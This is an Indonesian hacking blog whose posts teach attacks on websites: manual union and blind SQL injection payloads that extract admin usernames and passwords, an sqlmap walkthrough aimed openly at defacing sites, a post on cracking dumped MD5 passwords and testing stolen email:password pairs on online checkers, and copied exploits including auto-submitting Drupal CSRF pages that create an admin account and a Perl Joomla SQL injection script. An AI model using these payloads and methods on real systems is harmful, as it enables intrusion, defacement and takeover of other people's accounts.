\

Featured

Powered by Blogger.

Browsing "Older Posts"


kadang setelah berhasil melakukan penetrasi terhadap sebuah web dan mendapatkan admin username dan password kita bingung untuk mencari admin login nya.
nah sekarang saya akan share tools pembantu untuk menemukan admin page yang di program dalam bahasa perl.
karena program ini berjalan dengan bahasa perl maka bagi sobat yang menggunakan OS selain linux atau yang tidak ada perl nya silahkan download dan install perl nya dulu.

download perl

setelah perl nya terinstal di system, sekarang download admin finder nya

download admin finder

setelah itu extract file nya di direktori terserah kamu, misal di desktop.
untuk menjalankanya buka terminal / cmd dan ketikkan perintah "cd"
e.x
hocib0@bt:~$ cd /home/hocib0/Desktop/adminfinder
dan tekan enter maka sekarang kita berada di direktori adminfinder, setela itu ketikkan lagi perintah seperti ini
e.x
hocib0@bt:$ ~/Desktop/adminfinder$ perl adminfinder.pl
lalu tekan enter dan masukkan alamat web yang ingin di cek admin page nya,
enter lagi dan ketikkan bahasa pemrogaman yang di pakai, php,asp,html,dll
kalau tidak tahu ketik aja "any" dan tekan enter.

biarkan tools bekerja dan kita tinggal nunggu hasil laporanya :)

bagi pengguna linux jangan lupa di "chmod +x" dulu ya tools nya.


Tags:

admin finder perl

By admin → Monday, November 5, 2012

kali ini saya akan share sebuah tools yang sudah cukup lama tapi masih efektif, tools ini buatan anak devilzc0de, thx kk buat toolsnya :)
tools ini berguna sebagai dork scanner, hash cracker,login page scanner.
nih langsung aja download toolsnya nih:
toolrevtanpass:hocib0.blogspot.com
cara install nya mudah, tapi pertama kamu harus punya localhost terlebih dahulu seperti xampp, googling aja nanti ketemu tuh.
setelah kamu punya localhost, download dan extract file toolrevtan ke dalam direktori htdocs di localhost tadi. silahkan ganti nama direktori nya sesuka kamu :)
sekarang buka browser dan masukkan
e.x
http://localhost/tool
nah sekarang tinggal pakai deh tools nya .
kalau menggunakan dork scanner, jangan gunakan google sebagai untuk searching nya, pilih bing :)
Tags:

dork scanner revtan tools

By admin → Sunday, November 4, 2012

ok langsung aja, pertama cari dulu target yang vuln sql injection.
contoh disini saya mempunya target yaitu "http://www.site.com/index.php?id=1"

langkah pertama yang dilakukan adalah melakukan pengecekan apakah site ini benar mempunyai bug sql injection dengan menambahkan query "tanda petik" di belakang URL nya.
e.x
http://www.site.com/index.php?id=1'
kalau muncul pesan error (false) maka benar web ini rentan terhadap sql injection.
nah selanjutnya kita coba mencari dimana letak bug tersebut dengan menggunakan perintah "order by" disini kita akan mencari nilau true yang paling besar.
e.x
http://www.site.com/index.php?id=1+order+by+100--
kalau muncul pesan error maka turunkan nilai 100 menjadi lebih kecil
e.x
http://www.site.com/index.php?id=1+order+by+50-- (page error / false)
http://www.site.com/index.php?id=1+order+by+30-- (page error / false)
http://www.site.com/index.php?id=1+order+by+10-- (page normal / true)
http://www.site.com/index.php?id=1+order+by+11-- (page normal /true)
http://www.site.com/index.php?id=1+order+by+12-- (page error / false)
dari contoh diatas kita simpulkan bahwa nilau true yang paling besar adalah 11 karena 12 false.
langkah selanjutnya kita gunakan perintah "union+select" untuk melihat dimana kita bisa menyusup.
e.x
http://www.site.com/index.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11-- 
liat di web page nya, akan muncul angka dimana kita akan menginject script kita, disini saya contohkan  angka yang keluar adalah 5 maka langkah selanjutnya saya akan melihat versi berapa mysql nya.
e.x
http://www.site.com/index.php?id=1+union+select+1,2,3,4,@@version,6,7,8,9,10,11--
ternyata versi mysql nya adalah 5+ dengan versi 5+ maka kita akan bisa lebih mudah untuk melakukan sqli dengan perintah "where". tetapi kalau versinya 4+ maka akan sedikit lebih sulit karen kita versi ini biasanya blin sqli. baca tutor tentang blind sqli disini.

selanjutnya kita akan mengintip nama table yang ada di database web tersebut, begini caranya
e.x
http://www.site.com/index.php?id=1+union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10,11+from information_schema.tables+where+table_schema=database()--
 ternyata muncul nama table nya "user:member:product" nah saya lebih tertarik dengan table "user" maka saya akan mengintip columnyang ada di dalam table user tersebut dengan cara sebagai berikut
e.x
http://www.site.com/index.php?id=1+union+select+1,2,3,4,group_concat(column_name),6,7,8,9,10,11+from+information_schema.columns+where+table_name=CHAR(117, 115, 101, 114)--

CHAR(117, 115, 101, 114) adalah bentuk mysql char dari "user", atau anda bisa menggunakan text to hex converter disini. tekan enter dan lihat apa yang keluar, disini saya menemukan "username:password" maka langkah selanjutnya adalah seperti ini
e.x
http://www.site.com/index.php?id=1+union+select+1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11+from+user--
dan yang keluar seperti ini "admin:123456", jadi username=admin dan password=123456. setelah itu silahkan cari admin login dan masukkan username dan password tadi. setelah itu terserah mau di apain tuh web.. heheheh
Tags:

basic sql injection

By admin →

pertama carilah terlebih dahulu target yang vulner terhadap blind sqlinjection, bisa menggunakan dork dan cari di google atau dengan tools lainya terserah deh .
e.x
"http://www.site.com/news.php?id=3"
kemudian uji dulu apakah web ini benar vuln terhadap blind sqli dengan cara menambahkan "and 1=2" di akhir url web tersebut untuk memberi nilai false.
e.x
http://www.site.com/news.php?id=3 and 1=2
kalau web tersebut benar vuln sqli maka content dari web tersebut akan ada yang hilang atau web tidak diload dengan semestinya (false). untuk melihat nilai true nya tinggal ganti "and 1=2" menjadi "and 1=1"

ok kita anggap saja web tersebut vuln terhadap blind sqli, nah langkah selanjutnya yang harus dilakukan adalah dengan mencari versi dari mysql nya.
untuk dapat mengetahui versi mysql kita berikan perintah "and substring(@@version,1,1)=4" untuk mencari tahu apakah versi mysql nya "4".
atau "and substring(@@version,1,1)=5" untuk mencari tahu apakah versi mysql nya "5".
http://www.site.com/news.php?id=3 and substring(@@version,1,1)=4
atau
http://www.site.com/news.php?id=3 and substring(@@version,1,1)=5
setelah kita tahu versi berapa mysql nya sekarang kita cari tahu apakah perintah "subselect" dapat di eksekusi.
untuk mengetahuinya kita tambahkan  "and (select 1)=1" di belakang url.
e.x
http://www.site.com/news.php?id=3 and (select 1)=1
jika website di load dengan normal atau "true" maka subselect dapat di eksekusi :)

sekarang kita akan melihat apakah mysql.user bisa di akses dengan perintah berikut:
e.x
http://www.site.com/news.php?id=3 and (select 1 from mysql.user limit 0,1)=1
kalau website berjalan dengan normal berarti mysql.user dapat di akses, dan kita bisa menggunakan fungsi  load_file() dan OUTFILE.

sekarang kita akan memasuki tahap yang paling di tunggu tentunya, yaitu tahap pengecekan nama tables dan columns.
disini saya akan mencoba apakah table "users" ada di dalam database web tersebut.
ok yang harus dilakukan adalah seperti ini :
e.x
http://www.site.com/news.php?id=3 and (select 1 from users limit 0,1)=1
kalau web di load dengan normal atau "true" berarti table "users" ada di dalam database, sebaliknya kalau web di load dengan error atau sebagian content hilang atau "false" maka table "users" tidak ada di dalam database dan kita harus mencoba nama table lainya :)

disini kita anggap saja kalau table "users" ada di dalam database, selanjutnya kita akan mengintip isi dari table "users" tersebut atau "columns" dari table tersebut.
kali ini saya akan mencoba columns "username" dan "password"
begini nih perintahnya :
e.x
http://www.site.com/news.php?id=5 and (select substring(concat(1,username),1,1) from users limit 0,1)=1
e.x
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 
 kalau page di load dengan true berarti columns tersebut ada di dalam table users, tapi kalau nilainya false maka kita harus mencoba nama yang lain :)

nah ternyata columns username dan password ada, maka selanjutnya kita akan melihat apa isi di dalam columns tersebut, heheheh..
caranya dengan mencari nilai true yang paling akhir,
caranya seperti berikut :
e.x
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
 kalau web di load true maka kita ganti angka "80" menjadi lebih besar
e.x
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
page masih tetap saja true, kita coba lebih angka lebih besar lagi
e.x
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>100
wah ternyata di angka 100 web menjadi false... maka kita turunkan angkanya.
e.x
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
nilainya true, nah berarti karakter pertama adalah hasil konversi ascii dari angka 99 yaitu "c"

selanjutnya kita cari apa karakter kedua nya, caranya dengan mengganti angka 1,1 menjadi 2,1 .
begini nih :
 e.x
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
 nilai true maka ganti angka 99 menjadi lebih besar

e.x
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105
nilai false maka turunkan 105 menjadi lebih kecil sama seperti cara sebelumnya.

ok sekian dulu tutor dari saya, klo ada kesalahan atau yang tidak berkenan bagi teman2 yang master saya berharap untuk di berikan petunjuk.

Tags:

basic blind sql injection

By admin →
kali ini saya akan membahas tentang uniscan, uniscan adalah tools yang berguna untuk menemukan sebuah bug atau vulnerability pada sebuah web apps.

tools ini berbasis perl, maka kamu harus menginstall perl di dalam system kamu untuk menggunakan tools ini.

download perl disini

setelah perl terinstall di system, sekarang kamu harus mendownload uniscan juga tentunya.

download uniscan disini

extrack file uniscan nya di direktori, setelah itu buka terminal atau CMD dan ketikkan perintah berikut :
cd /direktori/uniscan
setelah kamu berada di direktori uniscan, ketikkan perintah berikut :
perl uniscan.pl -u https://target.com/ -bqweds
atau jika kamu ingin melihat apa saja yang bisa dilakukan oleh uniscan, ketikkan command berikut :
perl uniscan.pl -h


ok sekian dulu tutorial cupu dari saya, moga  bermanfaat .

Tags:

uniscan web vulnerability scanner

By admin →
sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.

biar lebih jelas saya akan menjelaskan sedikit tentang apa itu SQL injection dan database.
  • SQL injection adalah teknik hacking di mana attacker dapat menyisipkan perintah-perintah SQL melalu URL untuk di eksekusi oleh database. bug atau vulnerability ini terjadi karena kelalian seorang programer atau webmaster dalam melakukan pemograman web seperti tidak difilternya variabel dalam web tersebut.
  • Database adalah kumpulan informasi yang disimpan di dalam komputer atau webserver secara sistematik yang berguna untuk memperoleh informasi dari basis data tersebut.
ok cukup penjelasanya, kita langsung aja ke tutorial sqlmap dalam memanipulasi bug SQL injection.

pertama download dulu sqlmap nya :
sqlmap.zip untuk file berekstensi .zip
sqlmap.tar.gz untuk file berekstensi tar.gz

setelah di download extract file sqlmap nya, saya sarankan di desktop saja agar lebih mudah untuk prosesnya, atau di direktori lain juga boleh tergantung dari selera kita masing-masing :-D . kemudian rename folder yang telah di extract menjadi "sqlmap" (tanpa tanda kutip).

tools ini adalah tools yang berbasis program python, jadi untuk menjalankanya kita harus menginstall program python. kalau kamu pengguna linux kamu tidak usah repot-repot untuk menginstall python karena di linux sudah ada. tapi kalau kamu pengguna windows, kamu harus menginstall program python terlebih dahulu.

download python :

Windows x86 MSI Installer (2.7.3) untuk windows x86/32 bit
Windows X86-64 MSI Installer (2.7.3) untuk windows 64 bit
Mac OS X 64-bit/32-bit x86-64/i386 Installer (2.7.3) untuk MAC OS X 10.6/10.7
www.python.org/ftp/python/2.7.3/python-2.7.3-macosx10.3.dmg untuk MAC OS 10.3 - 10.6

kalau sudah di download kita lanjut ke step berikutnya.
pertama buka dulu terminal (linux) atau CMD (windows) kemudia ketikkan

untuk linux :
user@linux:~$ cd /Desktop/sqlmap/ 
untuk windows :
C:\Documents and Settings\user> cd /desktop/sqlmap/
kemudian tekan enter.

screenshoot ini diambil dari terminal backtrack 5 r2

kita ke step selanjutnya, saya anggap kamu sudah mempunyai target kamu sendiri, kalau belum ada silahkan cari sendiri :-p .
disini saya umpamakan ada sebuah situs dengan domain name "https://www.target.com" . dan mempunyai vulnerability pada tag "index.php?id=7" dengan methode get. langsung saja kita kembali ke terminal ata cmd tadi dan ketikkan lagi

linux :
user@linux:/Desktop/sqlmap# ./sqlmap.py -u https://www.target.com/index.php?id=7 --dbs
windows :
C:\Documents and Settings\user\desktop\sqlmap>sqlmap.py -u https://www.target.com/index.php?id=7 --dbs
perintah "-u" adalah "URL" target kita yang akan di eksekusi oleh sqlmap. perintah "--dbs" diatas adalah sqlmap akan berusaha mencari database dari web target kita tadi.

nah sekarang kita tunggu beberapa saat dan biarkan sqlmap bekerja sampai sqlmap menemukan database dari target kita. setelah bebearap saat sqlmap telah berhasil menemukan nama database dari target kita. asiikk !!!

saya umpamakan sqlmap berhasil mendapatkan 2 nama database yaitu
  • information_schema
  • my_db
langkah selanjutnya yang akan kita lakukan adalah mengintip table yang ada di dalam database tersebut, tapi database yang mana ? hmmmm sepertinya saya lebih tertarik sama database yang bernama "my_db".!! loh kenapa ? mungkin feeling aja :-p

sekarang kita ketikkan lagi perintah ini
./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db --tables
karena saya capek mengetikkan contoh untuk linux dan windows, jadi saya akan mengetikkan 1 contoh saja, bagi pengguna linux harus diawali dengan tanda "./" sebelum comand sedangkan di windows tidak di pakai alias langsung aja "sqlmap.py -u bla...bla...bla.."

ok next step, setelah kita tunggu beberapa saat ternyata sqlmap menemukan table yang ada di dalam database "my_db". saya umpamakan table-table tersebut adalah sebagai berikut.
  • admin
  • members
  • item
nah karena saya ingin melakukan deface, maka saya akan membuka isi dari table admin tersebut. langsung aja kita ketikkan di terminal atau CMD perintah ini
./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db -T admin --columns
 lalu enter dan tunggu beberapa saat, dan kita mendapati "column" dari "table" admin tadi. saya umpamakan nama columnya
  • ID
  • username
  • password
  • email_address
  • country
disini saya akan mengambil informasi dari dalam "column" admin tadi, yang ingin saya intip adalah "username","password",dan "email_address". maka saya akan kembali mengetikkan perintah
./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db -T admin -C username,password,email_address --dump
 dan hasilnya saya mendapati sebagai berikut :

admin:123456:admin@target.com
 ini artinya :
  • admin = username
  • 123456 = password
  • admin@target.com = email_address
nah sekarang saya tinggal mencari admin login dan siap melakukan deface . :-)

sekian dulu tutorial dari saya, kalau ada kekurangan saya minta maaf karena saya ini hanyalah seorang newbie yang ingin berbagi sedikit ilmu.

n.b : segala sesuatu yang ada pada tulisan ini hanyalah semata-mata untuk pembelajaran, segala resiko karena penerapanya kembali kepada mental para pembaca dan penulis tidak bertanggung jawab atas apa yg terjadi.
Tags:

tutorial SQL injection dengan sqlmap

By admin →
sebelumnya ane minta maap klo thread ini masih cupu, sama kayak ane yg masih newbie abizzz.

sabar

singkat cerita ane melakukan percobaan penetrasi pada sebuah web yang ada vuln sqlinjection, nah dari proses tersebut ane berhasil ngedump email dan password(md5) dari member yang ada di dalem ntuh web.
 peace

nah karena passwordnya md5 hash maka ane browsing ke sebuah web yg merupakan md5 decrypter online
hore

nih web nya
http://md5decrypter.co.uk/














trus ane masukin dah tuh md5 hash dan di decrypt oleh si mbah md5decrypter nya,

setelah password berhasil di decrypt ane masuk ke web email checker online

nih web nya yg biasa ane pake gan :
http://vietno1.biz/mail.php
http://www.chimong.us/mail.php














format untuk checker nya harus gini gan
email|password
atau
email:password
terserah agan aja,

tapi karena ane pake sqlmap untuk ngedumpnya, format dari output nya itu file.csv yg biasa ane buka pake libreoffice calc atau microsoft office xl klo di windows.














nah karena email ama passwordnya kan banyak noh jadi gk efektif banget klo copy paste satu2 dari file.csv ke format yg begini (email:password) tadi.

nah ane balek lagi ke md5decrypter tadi tapi masuk ke link "list tool" nya

ini nih link nya gan:
http://md5decrypter.co.uk/list-tool.aspx














trus ane masukin emailnya ke bagian "kolom left" dan passwordnya ke bagian "kolom right" abis tuh ane klik "combine left:right" dan hasilnya email dan password tadi jadi format kyk tadi (email:password).

trus ane copy and balik lagi ke mail checker tadi trus ane paste, tapi perhatikan split nya klo ane tadi kan model split nya ":" nah split by yg di mail checker juga ane ganti sama ":" .

gak pake lama lagi ane langsung klik "check now" dan tunggu beberapa saat, setelah itu lihat hasilnya.














nah klo ada tanda "OK" berwarna merah maka email sama passwordnya valid dan kita bisa login ke dalamnya, tapi kalo punya org luar musti pake proxy dulu.
smangatmaling

sekian dulu tutor sekaligus pengalaman cupu dari ane gan, semoga ada manfaat buat kita ... mohon jangan di hina
galau


Tags:

email checker online

By admin →
Seperti yang telah di ungkap sebelumnya, dengan banyaknya vulnerability yang telah ditemukan, untuk menhindari hal-hal tersebut diperlukan pembaharuan versi dari CMS dan komponen-komponen yang digunakan, karena dengan seiring berjalannya waktu pasti akan selalu ditemukan celah-celah dan kelemahan-kelemahan yang terdapat pada CMS dan komponen yang digunakan, atau mungkin ada bug yang bisa menyebabkan security ditembus dengan mudah.
Banyak sekalai tools yang tersedia baik untuk admin bahkan hacker untuk menemukan kelemahan tersebut. Berikut beberapa tools yang dapat digunakan untuk mengidentifikasi hal tersebut.

  • MetaSploit (http://www.metasploit.com) Tools open source ini digunakan oleh penetration tester, untuk menjebol situs atau mencari kelemahan suatu situs.

  • Nikto2 (http://cirt.net/nikto2) Tools ini akan mencari kelemahan, file-file yang sudah lama, mencari vulnerabilities, dan banyak lagi.
  • Acunetix (http://www.acunetix.com) Merupakan vulnerability scanner berbayar yang memeriksa Cross Site Scripting (XSS) error pada aplikasi pada laman web anda. Tools ini memeriksa penyesuain hukum pada Database Hacking Google, memeriksa area yang terproteksi password, dan banyak lagi.
  • BURP (http://portswigger.net) Menyediakan versi berbayar dan gratis untuk melakukan web-scanning. Salah satu fiturnya yaitu dapat menemukan traffic antara aplikasi dan browser. Fitur ini dapat menampilkan informasi bagaimana aplikasi anda berkerja. 
  • Nmap (http://nmap.org) Secara teknis sebetulnya bukan merupakan tools vulnerability scanner. Tools ini sebetulnya merupakan tools pengaudit security web.
  • Nessus (http://nessus.org) Tools ini dapat mengidentifikasi masalah-masalah seperti element yang sudah out of date pada server, mencari potensi celah-celah berbahaya, dan lain-lain.
Tags:

CMS Security: Vulnerability Scanning Tools

By admin → Thursday, November 1, 2012


Seperti yang sudah diungkap sebelumnya, tidak ada suatu CMS yang sempurna dalam hal security nya, dapat dipastikan ada satu atau dua celah yang dapat ditembus. Berikut merupakan beberapa contoh vulnerabilities yang diungkap di exploit-db.com.

1.       Drupal CMS 7.12

Penulis Ivano Binetti (http://ivanobinetti.com)
  • Exploit (Add Administrator)
<html>
<body onload="javascript:document.forms[0].submit()">
  <H2>CSRF Exploit change user to admin</H2>
  <form method="POST" name="form0" action="http://<IP_TARGET>/drupal/admin/people/create?render=overlay&render=overlay">
    <input type="hidden" name="name" value="new_admin"/>
    <input type="hidden" name="mail" value="ab@a.com"/>
    <input type="hidden" name="pass[pass1]" value="pass123"/>
    <input type="hidden" name="pass[pass2]" value="pass123"/>
    <input type="hidden" name="status" value="1"/>
    <input type="hidden" name="roles[3]" value="3"/>
    <input type="hidden" name="timezone" value="Asia/Jakarta"/>
    <input type="hidden" name="form_build_id" value="form-Aj18NNvRSPmhHJqC9KHYWlD5Fa4taVJbHoL2AmfmVcQ" />
    <input type="hidden" name="form_token" value="BXyA8uNbxtYnrsnuzoQehnsEOqNz4ojwNz8j26idueA"/>
    <input type="hidden" name="form_id" value="user_register_form"/>
    <input type="hidden" name="op" value="Create new account"/>
  </form>
</body>
</html>



Implementasi:
1. Simpan code pada file “test add admin.html”.
Code html untuk menambahkan user admin

2. Buka file pada browser.
Pemanggilan code pada web browser

3. User akan dibuat pada database.
User admin berhasil ditambahkan

  • Exploit (Force Logout)
<html>
<body onload="javascript:document.forms[0].submit()">
  <H2>CSRF Exploit to logout Admin</H2>
  <form method="POST" name="form0" action="http://<IP_TARGET>:80/drupal/user/logout">
  </form>
</body>
</html>

Implementasi:
1. Simpan code pada file “force log out.html”.
Code HTML untuk melakukan force logout
2. Panggil file yang sudah dibuat di webbrowser.
Pemanggilan code pada web browser

3. User akan ter-logout.
User berhasil logout

1.2.       Joomla tag Remote Sql Exploit

Penulis: Daniel Barragan "D4NB4R"
#!/usr/bin/perl -w
# Joomla Component (tag) Remote SQL Exploit
#--------------------------------------------------------------#

########################################
print "\t\t\n\n";
print "\t\n";
print "\t            Daniel Barragan  D4NB4R                \n";
print "\t                                                   \n";
print "\t      Joomla com_tag Remote Sql Exploit \n";
print "\t\n\n";

use LWP::UserAgent;
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";

chomp(my $target=<STDIN>);

#the username of  joomla
$user="username";
#the pasword of  joomla
$pass="password";
#the tables of joomla
$table="jos_users";
$d4n="com_tag&task";
$component="tag&lang=es";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $target ."index.php?option=".$d4n."=".$component."&tag=999999.9' union all select 1,concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,".$pass.",0x3c706173733e)+from ".$table."--+a";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
     
if ($answer =~ /<user>(.*?)<user>/){
  print "\nLos Datos Extraidos son:\n";
  print "\n
      * Admin User : $1";
}
    
if ($answer =~/<pass>(.*?)<pass>/){
  print "\n
      * Admin Hash : $1\n\n";
     
  print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
else{
  print "\n[-] Exploit Failed, Intente manualmente...\n";
}

Implementasi:

1. Simpan file pada tag.sh
Code program exploit
2. Jalankan program/code di atas operating system linux (eksekusiperl application).
Menjalankan code


 3. Masukan alamat target.
Memasukan alamat target yang akan di cari passwordnya

4. Password telah didapat, namun masih terenkripsi.
Hasil exploit com_tag
Tags:

CMS Security: Celah Keamanan Pada CMS

By admin →